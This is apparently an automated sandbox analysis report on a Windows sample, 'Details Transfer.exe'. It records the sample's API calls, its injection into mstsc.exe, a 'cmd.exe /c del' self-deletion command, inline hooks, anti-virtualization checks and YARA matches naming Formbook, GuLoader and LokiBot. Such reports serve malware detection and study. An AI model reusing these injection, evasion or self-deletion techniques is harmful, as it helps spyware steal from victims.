      Source: C:\Users\user\Desktop\Details Transfer.exeCode function: 2_2_1E3B9730 NtQueryVirtualMemory,2_2_1E3B9730
      Source: C:\Users\user\Desktop\Details Transfer.exeCode function: 2_2_1E3BA710 NtOpenProcessToken,2_2_1E3BA710
      Source: C:\Users\user\Desktop\Details Transfer.exeCode function: 2_2_1E3BA770 NtOpenThread,2_2_1E3BA770
      Source: C:\Users\user\Desktop\Details Transfer.exeCode function: 2_2_1E3B9770 NtSetInformationFile,2_2_1E3B9770
      Source: C:\Users\user\Desktop\Details Transfer.exeCode function: 2_2_1E3B9760 NtOpenProcess,2_2_1E3B9760
      Source: C:\Users\user\Desktop\Details Transfer.exeCode function: 2_2_1E3B9FE0 NtCreateMutant,2_2_1E3B9FE0
      Source: C:\Users\user\Desktop\Details Transfer.exeCode function: 2_2_1E3BAD30 NtSetContextThread,2_2_1E3BAD30
      Source: C:\Users\user\Desktop\Details Transfer.exeCode function: 2_2_1E3B9520 NtWaitForSingleObject,2_2_1E3B9520
      Source: C:\Users\user\Desktop\Details Transfer.exeCode function: 2_2_1E3B9560 NtWriteFile,2_2_1E3B9560
      Source: C:\Users\user\Desktop\Details Transfer.exeCode function: 2_2_1E3B95F0 NtQueryInformationFile,2_2_1E3B95F0
      Source: C:\Users\user\Desktop\Details Transfer.exeCode function: 2_2_1E3B9A10 NtQuerySection,2_2_1E3B9A10
      Source: C:\Users\user\Desktop\Details Transfer.exeCode function: 2_2_1E3B9A80 NtOpenDirectoryObject,2_2_1E3B9A80
      Source: C:\Users\user\Desktop\Details Transfer.exeCode function: 2_2_1E3B9B00 NtSetValueKey,2_2_1E3B9B00
      Source: C:\Users\user\Desktop\Details Transfer.exeCode function: 2_2_1E3BA3B0 NtGetContextThread,2_2_1E3BA3B0
      Source: C:\Users\user\Desktop\Details Transfer.exeCode function: 2_2_1E3B9820 NtEnumerateKey,2_2_1E3B9820
      Source: C:\Users\user\Desktop\Details Transfer.exeCode function: 2_2_1E3BB040 NtSuspendThread,2_2_1E3BB040
      Source: C:\Users\user\Desktop\Details Transfer.exeCode function: 2_2_1E3B98A0 NtWriteVirtualMemory,2_2_1E3B98A0
      Source: C:\Users\user\Desktop\Details Transfer.exeCode function: 2_2_1E3B9950 NtQueueApcThread,2_2_1E3B9950
      Source: C:\Users\user\Desktop\Details Transfer.exeCode function: 2_2_1E3B99D0 NtCreateProcessEx,2_2_1E3B99D0
      Source: C:\Users\user\Desktop\Details Transfer.exeCode function: 2_2_00563B69 NtSetInformationThread,NtSetInformationThread,2_2_00563B69
      Source: C:\Users\user\Desktop\Details Transfer.exeCode function: 2_2_005633D0 NtSetInformationThread,LoadLibraryA,2_2_005633D0
      Source: C:\Users\user\Desktop\Details Transfer.exeCode function: 2_2_0056378D NtProtectVirtualMemory,2_2_0056378D
      Source: C:\Users\user\Desktop\Details Transfer.exeCode function: 2_2_00560247 NtSetInformationThread,2_2_00560247
      Source: C:\Users\user\Desktop\Details Transfer.exeCode function: 2_2_00560603 NtProtectVirtualMemory,2_2_00560603
      Source: C:\Users\user\Desktop\Details Transfer.exeCode function: 2_2_00560295 NtSetInformationThread,2_2_00560295
      Source: C:\Users\user\Desktop\Details Transfer.exeCode function: 2_2_00563BC0 NtSetInformationThread,2_2_00563BC0
      Source: C:\Users\user\Desktop\Details Transfer.exeCode function: 2_2_00563BED NtSetInformationThread,2_2_00563BED
      Source: C:\Users\user\Desktop\Details Transfer.exeCode function: 2_2_00563B98 NtSetInformationThread,2_2_00563B98
      Source: C:\Users\user\Desktop\Details Transfer.exeCode function: 2_2_00563B81 NtSetInformationThread,2_2_00563B81
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 12_2_04E895D0 NtClose,LdrInitializeThunk,12_2_04E895D0
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 12_2_04E89540 NtReadFile,LdrInitializeThunk,12_2_04E89540
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 12_2_04E896E0 NtFreeVirtualMemory,LdrInitializeThunk,12_2_04E896E0
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 12_2_04E896D0 NtCreateKey,LdrInitializeThunk,12_2_04E896D0
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 12_2_04E89660 NtAllocateVirtualMemory,LdrInitializeThunk,12_2_04E89660
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 12_2_04E89650 NtQueryValueKey,LdrInitializeThunk,12_2_04E89650
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 12_2_04E89FE0 NtCreateMutant,LdrInitializeThunk,12_2_04E89FE0
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 12_2_04E89780 NtMapViewOfSection,LdrInitializeThunk,12_2_04E89780
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 12_2_04E89710 NtQueryInformationToken,LdrInitializeThunk,12_2_04E89710
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 12_2_04E89860 NtQuerySystemInformation,LdrInitializeThunk,12_2_04E89860
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 12_2_04E89840 NtDelayExecution,LdrInitializeThunk,12_2_04E89840
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 12_2_04E899A0 NtCreateSection,LdrInitializeThunk,12_2_04E899A0
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 12_2_04E89910 NtAdjustPrivilegesToken,LdrInitializeThunk,12_2_04E89910
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 12_2_04E89A50 NtCreateFile,LdrInitializeThunk,12_2_04E89A50
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 12_2_04E895F0 NtQueryInformationFile,12_2_04E895F0
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 12_2_04E89560 NtWriteFile,12_2_04E89560
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 12_2_04E89520 NtWaitForSingleObject,12_2_04E89520
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 12_2_04E8AD30 NtSetContextThread,12_2_04E8AD30
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 12_2_04E89670 NtQueryInformationProcess,12_2_04E89670
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 12_2_04E89610 NtEnumerateValueKey,12_2_04E89610
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 12_2_04E897A0 NtUnmapViewOfSection,12_2_04E897A0
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 12_2_04E89760 NtOpenProcess,12_2_04E89760
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 12_2_04E8A770 NtOpenThread,12_2_04E8A770
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 12_2_04E89770 NtSetInformationFile,12_2_04E89770
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 12_2_04E89730 NtQueryVirtualMemory,12_2_04E89730
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 12_2_04E8A710 NtOpenProcessToken,12_2_04E8A710
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 12_2_04E898F0 NtReadVirtualMemory,12_2_04E898F0
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 12_2_04E898A0 NtWriteVirtualMemory,12_2_04E898A0
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 12_2_04E8B040 NtSuspendThread,12_2_04E8B040
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 12_2_04E89820 NtEnumerateKey,12_2_04E89820
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 12_2_04E899D0 NtCreateProcessEx,12_2_04E899D0
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 12_2_04E89950 NtQueueApcThread,12_2_04E89950
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 12_2_04E89A80 NtOpenDirectoryObject,12_2_04E89A80
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 12_2_04E89A20 NtResumeThread,12_2_04E89A20
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 12_2_04E89A00 NtProtectVirtualMemory,12_2_04E89A00
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 12_2_04E89A10 NtQuerySection,12_2_04E89A10
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 12_2_04E8A3B0 NtGetContextThread,12_2_04E8A3B0
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 12_2_04E89B00 NtSetValueKey,12_2_04E89B00
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 12_2_00B09D50 NtCreateFile,12_2_00B09D50
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 12_2_00B09E80 NtClose,12_2_00B09E80
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 12_2_00B09E00 NtReadFile,12_2_00B09E00
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 12_2_00B09F30 NtAllocateVirtualMemory,12_2_00B09F30
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 12_2_00B09D4A NtCreateFile,12_2_00B09D4A
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 12_2_00B09F2B NtAllocateVirtualMemory,12_2_00B09F2B
      Source: C:\Users\user\Desktop\Details Transfer.exeCode function: 0_2_0040147C0_2_0040147C
      Source: C:\Users\user\Desktop\Details Transfer.exeCode function: 2_2_1E396E302_2_1E396E30
      Source: C:\Users\user\Desktop\Details Transfer.exeCode function: 2_2_1E43D6162_2_1E43D616
      Source: C:\Users\user\Desktop\Details Transfer.exeCode function: 2_2_1E442EF72_2_1E442EF7
      Source: C:\Users\user\Desktop\Details Transfer.exeCode function: 2_2_1E44DFCE2_2_1E44DFCE
      Source: C:\Users\user\Desktop\Details Transfer.exeCode function: 2_2_1E441FF12_2_1E441FF1
      Source: C:\Users\user\Desktop\Details Transfer.exeCode function: 2_2_1E43D4662_2_1E43D466
      Source: C:\Users\user\Desktop\Details Transfer.exeCode function: 2_2_1E38841F2_2_1E38841F
      Source: C:\Users\user\Desktop\Details Transfer.exeCode function: 2_2_1E441D552_2_1E441D55
      Source: C:\Users\user\Desktop\Details Transfer.exeCode function: 2_2_1E370D202_2_1E370D20
      Source: C:\Users\user\Desktop\Details Transfer.exeCode function: 2_2_1E442D072_2_1E442D07
      Source: C:\Users\user\Desktop\Details Transfer.exeCode function: 2_2_1E4425DD2_2_1E4425DD
      Source: C:\Users\user\Desktop\Details Transfer.exeCode function: 2_2_1E3A25812_2_1E3A2581
      Source: C:\Users\user\Desktop\Details Transfer.exeCode function: 2_2_1E38D5E02_2_1E38D5E0
      Source: C:\Users\user\Desktop\Details Transfer.exeCode function: 2_2_1E4422AE2_2_1E4422AE
      Source: C:\Users\user\Desktop\Details Transfer.exeCode function: 2_2_1E442B282_2_1E442B28
      Source: C:\Users\user\Desktop\Details Transfer.exeCode function: 2_2_1E3AEBB02_2_1E3AEBB0
      Source: C:\Users\user\Desktop\Details Transfer.exeCode function: 2_2_1E43DBD22_2_1E43DBD2
      Source: C:\Users\user\Desktop\Details Transfer.exeCode function: 2_2_1E4303DA2_2_1E4303DA
      Source: C:\Users\user\Desktop\Details Transfer.exeCode function: 2_2_1E4310022_2_1E431002
      Source: C:\Users\user\Desktop\Details Transfer.exeCode function: 2_2_1E44E8242_2_1E44E824
      Source: C:\Users\user\Desktop\Details Transfer.exeCode function: 2_2_1E3A20A02_2_1E3A20A0
      Source: C:\Users\user\Desktop\Details Transfer.exeCode function: 2_2_1E38B0902_2_1E38B090
      Source: C:\Users\user\Desktop\Details Transfer.exeCode function: 2_2_1E4428EC2_2_1E4428EC
      Source: C:\Users\user\Desktop\Details Transfer.exeCode function: 2_2_1E4420A82_2_1E4420A8
      Source: C:\Users\user\Desktop\Details Transfer.exeCode function: 2_2_1E3941202_2_1E394120
      Source: C:\Users\user\Desktop\Details Transfer.exeCode function: 2_2_1E37F9002_2_1E37F900
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 12_2_04F0D46612_2_04F0D466
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 12_2_04E5841F12_2_04E5841F
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 12_2_04E5D5E012_2_04E5D5E0
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 12_2_04F125DD12_2_04F125DD
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 12_2_04E7258112_2_04E72581
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 12_2_04F11D5512_2_04F11D55
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 12_2_04E40D2012_2_04E40D20
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 12_2_04F12D0712_2_04F12D07
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 12_2_04F12EF712_2_04F12EF7
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 12_2_04E66E3012_2_04E66E30
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 12_2_04F0D61612_2_04F0D616
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 12_2_04F11FF112_2_04F11FF1
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 12_2_04F1DFCE12_2_04F1DFCE
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 12_2_04F128EC12_2_04F128EC
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 12_2_04E720A012_2_04E720A0
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 12_2_04F120A812_2_04F120A8
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 12_2_04E5B09012_2_04E5B090
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 12_2_04F1E82412_2_04F1E824
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 12_2_04E6A83012_2_04E6A830
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 12_2_04F0100212_2_04F01002
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 12_2_04E699BF12_2_04E699BF
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 12_2_04E6412012_2_04E64120
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 12_2_04E4F90012_2_04E4F900
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 12_2_04F122AE12_2_04F122AE
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 12_2_04EFFA2B12_2_04EFFA2B
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 12_2_04F0DBD212_2_04F0DBD2
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 12_2_04F003DA12_2_04F003DA
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 12_2_04E7ABD812_2_04E7ABD8
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 12_2_04E7EBB012_2_04E7EBB0
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 12_2_04E6AB4012_2_04E6AB40
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 12_2_04F12B2812_2_04F12B28
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 12_2_04E6A30912_2_04E6A309
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 12_2_00B0D80B12_2_00B0D80B
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 12_2_00B0D23412_2_00B0D234
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 12_2_00B0E22312_2_00B0E223
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 12_2_00AF2D8912_2_00AF2D89
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 12_2_00AF2D9012_2_00AF2D90
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 12_2_00AF9E2D12_2_00AF9E2D
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 12_2_00AF9E3012_2_00AF9E30
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 12_2_00B0E61912_2_00B0E619
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 12_2_00B0DE4012_2_00B0DE40
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 12_2_00B0DFBC12_2_00B0DFBC
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 12_2_00AF2FB012_2_00AF2FB0
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 12_2_00B0CF9612_2_00B0CF96
      Source: C:\Users\user\Desktop\Details Transfer.exeCode function: String function: 1E37B150 appears 39 times
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: String function: 04E4B150 appears 87 times
      Source: Details Transfer.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
      Source: Details Transfer.exe, 00000000.00000002.226169530.00000000022F0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameuser32j% vs Details Transfer.exe
      Source: Details Transfer.exe, 00000000.00000002.226000362.000000000040C000.00000002.00020000.sdmpBinary or memory string: OriginalFilenamepellet.exe vs Details Transfer.exe
      Source: Details Transfer.exe, 00000002.00000002.305063110.000000001DC30000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamemswsock.dll.muij% vs Details Transfer.exe
      Source: Details Transfer.exe, 00000002.00000002.306341652.000000001E5FF000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs Details Transfer.exe
      Source: Details Transfer.exe, 00000002.00000002.306702886.000000001E7A3000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamemstsc.exej% vs Details Transfer.exe
      Source: Details Transfer.exe, 00000002.00000002.305089937.000000001DD80000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameCRYPT32.DLL.MUIj% vs Details Transfer.exe
      Source: Details Transfer.exe, 00000002.00000000.225112022.000000000040C000.00000002.00020000.sdmpBinary or memory string: OriginalFilenamepellet.exe vs Details Transfer.exe
      Source: Details Transfer.exeBinary or memory string: OriginalFilenamepellet.exe vs Details Transfer.exe
      Source: 0000000C.00000002.471474023.0000000000AF0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 0000000C.00000002.471474023.0000000000AF0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 0000000C.00000002.472575056.0000000000F10000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 0000000C.00000002.472575056.0000000000F10000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 0000000C.00000002.472634942.0000000000F40000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 0000000C.00000002.472634942.0000000000F40000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 00000002.00000002.301196931.00000000000A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 00000002.00000002.301196931.00000000000A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 0000000C.00000002.471837023.0000000000BA2000.00000004.00000020.sdmp, type: MEMORYMatched rule: LokiBot_Dropper_Packed_R11_Feb18 date = 2018-02-14, hash1 = 3b248d40fd7acb839cc592def1ed7652734e0e5ef93368be3c36c042883a3029, author = Florian Roth, description = Auto-generated rule - file scan copy.pdf.r11, reference = https://app.any.run/tasks/401df4d9-098b-4fd0-86e0-7a52ce6ddbf5, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 0000000C.00000002.476551584.000000000534F000.00000004.00000001.sdmp, type: MEMORYMatched rule: LokiBot_Dropper_Packed_R11_Feb18 date = 2018-02-14, hash1 = 3b248d40fd7acb839cc592def1ed7652734e0e5ef93368be3c36c042883a3029, author = Florian Roth, description = Auto-generated rule - file scan copy.pdf.r11, reference = https://app.any.run/tasks/401df4d9-098b-4fd0-86e0-7a52ce6ddbf5, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 00000002.00000002.305279752.000000001E120000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 00000002.00000002.305279752.000000001E120000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/0@5/1
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1968:120:WilError_01
      Source: C:\Users\user\Desktop\Details Transfer.exeFile created: C:\Users\user\AppData\Local\Temp\~DFB9981D64B7738EA0.TMPJump to behavior
      Source: Details Transfer.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
      Source: C:\Users\user\Desktop\Details Transfer.exeSection loaded: C:\Windows\SysWOW64\msvbvm60.dllJump to behavior
      Source: C:\Users\user\Desktop\Details Transfer.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
      Source: C:\Users\user\Desktop\Details Transfer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\Users\user\Desktop\Details Transfer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\Users\user\Desktop\Details Transfer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\Users\user\Desktop\Details Transfer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: unknownProcess created: C:\Users\user\Desktop\Details Transfer.exe 'C:\Users\user\Desktop\Details Transfer.exe'
      Source: unknownProcess created: C:\Users\user\Desktop\Details Transfer.exe 'C:\Users\user\Desktop\Details Transfer.exe'
      Source: unknownProcess created: C:\Windows\SysWOW64\mstsc.exe C:\Windows\SysWOW64\mstsc.exe
      Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\Details Transfer.exe'
      Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Users\user\Desktop\Details Transfer.exeProcess created: C:\Users\user\Desktop\Details Transfer.exe 'C:\Users\user\Desktop\Details Transfer.exe' Jump to behavior
      Source: C:\Windows\SysWOW64\mstsc.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\Details Transfer.exe'Jump to behavior
      Source: Window RecorderWindow detected: More than 3 window changes detected
      Source: Binary string: wntdll.pdbUGP source: Details Transfer.exe, 00000002.00000002.305770230.000000001E350000.00000040.00000001.sdmp, mstsc.exe, 0000000C.00000002.475461428.0000000004F3F000.00000040.00000001.sdmp
      Source: Binary string: wntdll.pdb source: Details Transfer.exe, mstsc.exe
      Source: Binary string: mstsc.pdbGCTL source: Details Transfer.exe, 00000002.00000002.306564678.000000001E680000.00000040.00000001.sdmp
      Source: Binary string: mstsc.pdb source: Details Transfer.exe, 00000002.00000002.306564678.000000001E680000.00000040.00000001.sdmp

      Data Obfuscation:

      barindex
      Yara detected GuLoaderShow sources
      Source: Yara matchFile source: 00000002.00000002.301329447.0000000000560000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: Process Memory Space: Details Transfer.exe PID: 6716, type: MEMORY
      Source: Yara matchFile source: Process Memory Space: Details Transfer.exe PID: 6936, type: MEMORY
      Yara detected VB6 Downloader GenericShow sources
      Source: Yara matchFile source: Process Memory Space: Details Transfer.exe PID: 6716, type: MEMORY
      Source: Yara matchFile source: Process Memory Space: Details Transfer.exe PID: 6936, type: MEMORY
      Source: C:\Users\user\Desktop\Details Transfer.exeCode function: 0_2_0040208C push esi; retf 0_2_0040208D
      Source: C:\Users\user\Desktop\Details Transfer.exeCode function: 0_2_004024BF push esp; ret 0_2_004024C1
      Source: C:\Users\user\Desktop\Details Transfer.exeCode function: 0_2_0040254B push esp; ret 0_2_0040254D
      Source: C:\Users\user\Desktop\Details Transfer.exeCode function: 0_2_0040515B push ebp; ret 0_2_0040516C
      Source: C:\Users\user\Desktop\Details Transfer.exeCode function: 0_2_00402901 push esp; ret 0_2_00402909
      Source: C:\Users\user\Desktop\Details Transfer.exeCode function: 0_2_0040253D push esp; ret 0_2_00402541
      Source: C:\Users\user\Desktop\Details Transfer.exeCode function: 0_2_00402DF8 push edi; iretd 0_2_00402E2A
      Source: C:\Users\user\Desktop\Details Transfer.exeCode function: 0_2_00403192 pushfd ; ret 0_2_00403193
      Source: C:\Users\user\Desktop\Details Transfer.exeCode function: 0_2_00402ACA push esi; retf 0_2_00402ACD
      Source: C:\Users\user\Desktop\Details Transfer.exeCode function: 0_2_00404B51 push ebp; retf 0_2_00404B5A
      Source: C:\Users\user\Desktop\Details Transfer.exeCode function: 0_2_00403301 pushfd ; iretd 0_2_004033A7
      Source: C:\Users\user\Desktop\Details Transfer.exeCode function: 0_2_00404BE3 pushfd ; retf 0_2_00404BF5
      Source: C:\Users\user\Desktop\Details Transfer.exeCode function: 0_2_04F4271D push esi; ret 0_2_04F42725
      Source: C:\Users\user\Desktop\Details Transfer.exeCode function: 2_2_1E3CD0D1 push ecx; ret 2_2_1E3CD0E4
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 12_2_04E9D0D1 push ecx; ret 12_2_04E9D0E4
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 12_2_00B0691E push eax; ret 12_2_00B0691F
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 12_2_00B06A5E push ds; ret 12_2_00B06A5F
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 12_2_00B0E46B push edi; retf 12_2_00B0E46C
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 12_2_00B0CEA5 push eax; ret 12_2_00B0CEF8
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 12_2_00B0CEF2 push eax; ret 12_2_00B0CEF8
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 12_2_00B0CEFB push eax; ret 12_2_00B0CF62
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 12_2_00B07624 push ebp; ret 12_2_00B0762E
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 12_2_00B0761D push 72A11B81h; iretd 12_2_00B07623
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 12_2_00B0BE68 push ss; ret 12_2_00B0BE6C
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 12_2_00B0CF5C push eax; ret 12_2_00B0CF62

      Hooking and other Techniques for Hiding and Protection:

      barindex
      Modifies the prolog of user mode functions (user mode inline hooks)Show sources
      Source: explorer.exeUser mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x83 0x3E 0xE2
      Source: C:\Users\user\Desktop\Details Transfer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Details Transfer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Details Transfer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Details Transfer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Details Transfer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\mstsc.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

      Malware Analysis System Evasion:

      barindex
      Contains functionality to detect hardware virtualization (CPUID execution measurement)Show sources
      Source: C:\Users\user\Desktop\Details Transfer.exeCode function: 0_2_04F40208 EnumWindows,NtSetInformationThread,TerminateProcess,LoadLibraryA,0_2_04F40208
      Detected RDTSC dummy instruction sequence (likely for instruction hammering)Show sources
